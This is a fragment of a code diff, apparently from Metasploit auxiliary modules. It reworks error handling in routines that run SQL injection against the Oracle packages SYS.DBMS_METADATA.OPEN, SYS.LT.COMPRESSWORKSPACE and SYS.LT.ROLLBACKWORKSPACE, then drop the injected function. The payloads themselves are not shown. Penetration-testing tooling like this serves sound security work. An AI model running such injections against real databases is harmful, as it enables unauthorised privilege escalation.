|
||||
prepare_exec(clean)
|
||||
else
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -57,16 +57,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
clean = "DROP FUNCTION #{cruft}"
|
||||
|
||||
print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
prepare_exec(package1)
|
||||
prepare_exec(package2)
|
||||
rescue => e
|
||||
if ( e.to_s =~ /No Data/ )
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
else
|
||||
return
|
||||
end
|
||||
end
|
||||
prepare_exec(package1)
|
||||
prepare_exec(package2)
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -87,14 +87,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
clean = "DROP FUNCTION #{cruft}"
|
||||
|
||||
print_status("Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...")
|
||||
begin
|
||||
prepare_exec(sql)
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
|
||||
prepare_exec(sql)
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
end
|
||||
|
|